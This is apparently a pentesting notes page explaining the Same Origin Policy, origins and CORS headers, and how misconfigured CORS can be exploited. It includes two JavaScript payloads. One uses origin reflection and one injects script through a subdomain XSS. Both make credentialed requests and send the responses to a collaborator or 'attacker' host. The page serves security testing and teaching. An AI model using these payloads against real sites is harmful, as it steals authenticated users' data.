CORS

Cross-Origin Resource Sharing (CORS) pentest notes

Browser Security Mechanisms

Cross-Origin Resource Sharing (CORS) is a policy to relax the Same Origin Policy (SOP). Both CORS and SOP policies are browser security mechanisms that limit JavaScript runtime to access resources from different origins (or domains for simplicity).

Same Origin Policy (SOP)

Internally JavaScript can send a request to a different "domain", but the browser will block to pass the response back to the JavaScript's runtime. The rule is simple, the browser will block the response if JavaScript's origin differs from a resource origin.

The SOP has some exceptions which allow cross-domain resource access (out of the JavaScript runtime context). For example, it's allowed to load an image, a font, or a JavaScript source code from a different origin. Right, you can load a JavaScript code from a different origin, but when the JavaScript is executed the SOP will not hand over the response to the JavaScript runtime.

What's Origin

An origin is a term in browser security upon SOP and CORS decisions are made. The origin is a combination of protocol, domain (host), and port to identify a "source" of a particular resource. The origin can not be simply a domain because there can be multiple web applications on a single host, communicating on different ports and protocols.

When a user or a JavaScript makes a request to a specific URL, the browser adds HTTP header "Origin: protocol://domain:port" to inform a web server to adjust CORS headers. Regardless of whether the site supports CORS or not ...when a browser receives a response, it evaluates its origin and considers SOP and CORS rules.

CORS headers

The server can provide the following CORS headers to relax SOP

Access-Control-Allow-Origin: origin HTTP header defines which origin is allowed to access resources.

Access-Control-Allow-Credentials: true allows to accessing authenticated resources. A cookie or authorization header is added by a browser when JavaScript wants to access the resource.

Pentesting CORS

CORS attacks assume, there is a XSS vulnerability within the app and these CORS headers set: Access-Control-Allow-Origins: origin-value, Access-Control-Allow-Credentials:true,

The CORS misconfigurations account with reflected origin, null origin and insecure protocol/subdomain origin.

Origin reflection

<script>
    var req = new XMLHttpRequest();
    req.onload = reqListener;
    req.open('get','https://domain/URI',true);
    req.withCredentials = true;
    req.send();

    function reqListener() {
        location='https://burpcollaborator.domain/log?key='+this.responseText;
    };
</script>

Null origin

Insecure protocol or subdomain

XSS vulnerability exists in the app running on a subdomain.

<script>
    document.location="http://subdomain.domain/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://domain/sensitiveURI',true); req.withCredentials = true;req.send();function reqListener() {location='https://attacker/log?key='%2bthis.responseText; };%3c/script>&storeId=1"
</script>

References

https://portswigger.net/web-security/cors

PreviousShell Fu - OnelinersNextSpecial Chars & NULL Bytes

Last updated